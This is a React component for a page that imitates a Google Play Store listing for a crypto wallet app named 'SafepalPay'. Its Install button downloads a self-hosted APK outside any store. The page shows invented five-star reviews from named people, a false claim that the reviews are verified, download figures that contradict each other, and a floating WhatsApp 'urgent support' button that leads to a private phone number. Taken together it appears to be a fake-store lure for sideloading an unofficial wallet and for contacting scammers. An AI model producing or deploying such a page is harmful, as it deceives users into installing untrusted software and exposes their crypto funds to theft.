import React from 'react';
import './InstaPlaystore.css';
import logo from '../assets/logo.png';
import screenshot1 from '../assets/screenshot1.png';
import screenshot2 from '../assets/screenshot2.png';
import screenshot3 from '../assets/screenshot3.png';
import { useNavigate } from "react-router-dom";

/* ================= WHATSAPP FLOAT COMPONENT ================= */
const WhatsAppFloat = ({ 
  phoneNumber = "15485825756", 
  message = "Hello! I need urgent support from safepalPay customer service regarding the Play Store app.",
  position = "right",
  bottom = "30px",
  right = "30px",
  left = "auto",
  size = "54px",
  iconSize = "28px",
  pulseEffect = true,
  className = "",
  style = {}
}) => {
  const formattedNumber = phoneNumber.replace(/[^\d]/g, '');
  const whatsappUrl = `https://wa.me/${formattedNumber}?text=${encodeURIComponent(message)}`;
  
  const positionStyles = position === "left" 
    ? { left: left || "20px", right: "auto" }
    : { right: right || "20px", left: "auto" };

  const combinedStyles = {
    position: 'fixed',
    bottom: bottom,
    width: size,
    height: size,
    borderRadius: '50%',
    backgroundColor: '#25d366',
    display: 'flex',
    alignItems: 'center',
    justifyContent: 'center',
    boxShadow: '0 4px 20px rgba(0, 0, 0, 0.2)',
    zIndex: 10000,
    cursor: 'pointer',
    transition: 'all 0.3s ease',
    textDecoration: 'none',
    ...positionStyles,
    ...style
  };

  return (
    <a
      href={whatsappUrl}
      target="_blank"
      rel="noopener noreferrer nofollow"
      className={`whatsapp-float-unique ${pulseEffect ? 'pulse-unique' : ''} ${className}`}
      style={combinedStyles}
      aria-label="Chat on WhatsApp"
      title="Chat on WhatsApp for app support"
    >
      <svg 
        width={iconSize} 
        height={iconSize} 
        viewBox="0 0 24 24"
        fill="white"
      >
        <path d="M17.472 14.382c-.297-.149-1.758-.867-2.03-.967-.273-.099-.471-.148-.67.15-.197.297-.767.966-.94 1.164-.173.199-.347.223-.644.074-.297-.15-1.255-.463-2.39-1.475-.883-.788-1.48-1.761-1.653-2.059-.173-.297-.018-.458.13-.606.134-.133.298-.347.446-.52.149-.174.198-.298.298-.497.099-.198.05-.371-.025-.52-.074-.149-.669-1.612-.916-2.207-.242-.579-.487-.5-.669-.51-.173-.008-.371-.01-.57-.01-.198 0-.52.074-.792.372-.272.297-1.04 1.016-1.04 2.479 0 1.462 1.065 2.875 1.213 3.074.149.198 2.096 3.2 5.077 4.487.709.306 1.262.489 1.694.625.712.227 1.36.195 1.871.118.571-.085 1.758-.719 2.006-1.413.248-.694.248-1.289.173-1.413-.074-.124-.272-.198-.57-.347m-5.421 7.403h-.004a9.87 9.87 0 01-5.031-1.378l-.361-.214-3.76.982.998-3.677-.236-.374a9.86 9.86 0 01-1.51-5.26c.001-5.45 4.436-9.884 9.888-9.884 2.64 0 5.122 1.03 6.988 2.898a9.826 9.826 0 012.9 6.994c-.004 5.45-4.438 9.88-9.888 9.88m8.413-18.297A11.815 11.815 0 0012.05 0C5.495 0 .16 5.333.157 11.892c0 2.096.547 4.142 1.588 5.945L.057 24l6.305-1.654a11.882 11.882 0 005.683 1.448h.005c6.554 0 11.89-5.333 11.893-11.893 0-3.18-1.24-6.162-3.495-8.411" />
      </svg>
    </a>
  );
};

export default function InstaPlaystore() {
  const navigate = useNavigate();
  
  // Handle APK download with tracking
  const handleInstallClick = (e) => {
    if (window.gtag) {
      window.gtag('event', 'apk_download', {
        'event_category': 'engagement',
        'event_label': 'SafepalPay APK Download'
      });
    }
    console.log('APK download initiated for SafepalPay');
  };
  
  return (
    <div className="playstore-container-unique">
      <span className="instaplaystore-back-unique" onClick={() => navigate('/')}>←</span>
      
      {/* Header */}
      <div className="app-header-unique">
        <img src={logo} alt="SafepalPay logo" className="app-icon-unique" />
        <div className="app-info-unique">
          <h1 className="app-name-unique">SafepalPay</h1>
          <p className="app-developer-unique">SafepalPay Global Ltd</p>
          <p className="app-meta-unique">Contains ads · In-app purchases</p>
        </div>
      </div>
      
      {/* Stats */}
      <div className="app-stats-unique">
        <div className="stat-item-unique">
          <div className="stat-value-unique">4.8★</div>
          <div className="stat-label-unique">12K reviews</div>
        </div>
        <div className="stat-divider-unique"></div>
        <div className="stat-item-unique">
          <div className="stat-value-unique">973K+</div>
          <div className="stat-label-unique">Downloads</div>
        </div>
        <div className="stat-divider-unique"></div>
        <div className="stat-item-unique">
          <div className="stat-value-unique">
            <span className="pegi-badge-unique">PEGI 3</span>
          </div>
          <div className="stat-label-unique">Rated for 3+</div>
        </div>
      </div>

      {/* Install Button */}
      <a
        href="/apk/SafepalPay.apk"
        download
        className="install-btn-unique"
        onClick={handleInstallClick}
      >
        Install
      </a>

      {/* Screenshots */}
      <div className="screenshots-unique">
        <img src={screenshot1} alt="App screenshot 1" className="screenshot-img-unique" />
        <img src={screenshot2} alt="App screenshot 2" className="screenshot-img-unique" />
        <img src={screenshot3} alt="App screenshot 3" className="screenshot-img-unique" />
      </div>

      {/* About Section */}
      <div className="section-unique">
        <div className="section-header-unique">
          <h2 className="section-title-unique">About this app</h2>
          <span className="section-arrow-unique">→</span>
        </div>
        <p className="about-text-unique">
          Experience the next generation of mobile finance with SafepalPay. Built for speed, security, and simplicity. 
          Manage your Crypto wallet, send funds instantly, and stay in full control of your digital assets. 
          Secure transactions, low fees, and 24/7 customer support.
        </p>
        <div className="tags-unique">
          <span className="tag-unique">Finance</span>
          <span className="tag-unique">Secure</span>
          <span className="tag-unique">Crypto Wallet</span>
          <span className="tag-unique">Instant Transfer</span>
        </div>
      </div>

      {/* Features Section - Enhanced */}
      <div className="section-unique">
        <div className="section-header-unique">
          <h2 className="section-title-unique">Key Features</h2>
          <span className="section-arrow-unique">→</span>
        </div>
        <div className="features-grid-unique">
          <div className="feature-item-unique">
            <div className="feature-icon-unique">🔒</div>
            <div className="feature-text-unique">Bank-Level Security</div>
          </div>
          <div className="feature-item-unique">
            <div className="feature-icon-unique">⚡</div>
            <div className="feature-text-unique">Lightning Fast Transactions</div>
          </div>
          <div className="feature-item-unique">
            <div className="feature-icon-unique">💎</div>
            <div className="feature-text-unique">Multiple Cryptocurrencies</div>
          </div>
          <div className="feature-item-unique">
            <div className="feature-icon-unique">🛡️</div>
            <div className="feature-text-unique">24/7 Customer Support</div>
          </div>
        </div>
      </div>

      {/* Ratings Section */}
      <div className="section-unique">
        <div className="section-header-unique">
          <h2 className="section-title-unique">Ratings and reviews</h2>
          <span className="section-arrow-unique">→</span>
        </div>
        <p className="ratings-disclaimer-unique">
          Ratings and reviews are verified and are from people who use the same type of device that you use.
        </p>

        {/* Rating Overview */}
        <div className="rating-overview-unique">
          <div className="rating-score-unique">
            <div className="score-number-unique">4.8</div>
            <div className="score-stars-unique">★★★★★</div>
            <div className="score-count-unique">12,431 reviews</div>
          </div>
          <div className="rating-bars-unique">
            {[
              { star: 5, width: '85%' },
              { star: 4, width: '10%' },
              { star: 3, width: '2%' },
              { star: 2, width: '2%' },
              { star: 1, width: '1%' }
            ].map(({ star, width }) => (
              <div key={star} className="rating-bar-row-unique">
                <span className="rating-star-num-unique">{star}</span>
                <div className="rating-bar-bg-unique">
                  <div className="rating-bar-fill-unique" style={{width}}></div>
                </div>
              </div>
            ))}
          </div>
        </div>

        {/* Review 1 */}
        <div className="review-card-unique">
          <div className="review-header-unique">
            <div className="reviewer-avatar-unique">S</div>
            <div className="reviewer-name-unique">Sarah Martin</div>
            <span className="review-menu-unique">⋮</span>
          </div>
          <div className="review-stars-unique">★★★★★</div>
          <div className="review-date-unique">January 12, 2026</div>
          <p className="review-text-unique">
            The UI is incredibly clean and transfers happen instantly. Best Crypto wallet app I've used so far. 
            Highly recommend for anyone looking to get into crypto.
          </p>
          <div className="review-helpful-unique">
            Was this review helpful?
            <button className="helpful-btn-unique">Yes</button>
            <button className="helpful-btn-unique">No</button>
          </div>
        </div>

        {/* Review 2 */}
        <div className="review-card-unique">
          <div className="review-header-unique">
            <div className="reviewer-avatar-unique">M</div>
            <div className="reviewer-name-unique">Michael Chen</div>
            <span className="review-menu-unique">⋮</span>
          </div>
          <div className="review-stars-unique">★★★★★</div>
          <div className="review-date-unique">January 8, 2026</div>
          <p className="review-text-unique">
            Very secure platform. I've been using SafepalPay for 3 months now and never had any issues. 
            Customer support is responsive and helpful.
          </p>
          <div className="review-helpful-unique">
            Was this review helpful?
            <button className="helpful-btn-unique">Yes</button>
            <button className="helpful-btn-unique">No</button>
          </div>
        </div>
      </div>

      {/* Additional Info Section */}
      <div className="section-unique">
        <div className="section-header-unique">
          <h2 className="section-title-unique">Additional Information</h2>
          <span className="section-arrow-unique">→</span>
        </div>
        <div className="info-grid-unique">
          <div className="info-row-unique">
            <span className="info-label-unique">Updated</span>
            <span className="info-value-unique">February 1, 2026</span>
          </div>
          <div className="info-row-unique">
            <span className="info-label-unique">Size</span>
            <span className="info-value-unique">48MB</span>
          </div>
          <div className="info-row-unique">
            <span className="info-label-unique">Installs</span>
            <span className="info-value-unique">1,000,000+</span>
          </div>
          <div className="info-row-unique">
            <span className="info-label-unique">Current Version</span>
            <span className="info-value-unique">3.2.1</span>
          </div>
          <div className="info-row-unique">
            <span className="info-label-unique">Requires Android</span>
            <span className="info-value-unique">8.0 and up</span>
          </div>
          <div className="info-row-unique">
            <span className="info-label-unique">Content Rating</span>
            <span className="info-value-unique">Rated for 3+</span>
          </div>
        </div>
      </div>

      {/* Footer */}
      <div className="footer-unique">
        <div className="footer-updated-unique">Updated on Feb 1, 2026</div>
        <div className="footer-category-unique">FINANCE</div>
        <div className="footer-links-unique">
          <a href="#" className="footer-link-unique">Privacy Policy</a>
          <a href="#" className="footer-link-unique">Terms of Service</a>
          <a href="#" className="footer-link-unique">Contact Support</a>
        </div>
      </div>
      
      {/* WhatsApp Float Button - For Play Store Support */}
      <WhatsAppFloat 
        phoneNumber="15485825756"
        message="Hello! I need urgent support from safepalPay customer service regarding the Play Store app."
        position="right"
        bottom="30px"
        right="30px"
        pulseEffect={true}
        size="54px"
        iconSize="28px"
      />
    </div>
  );
}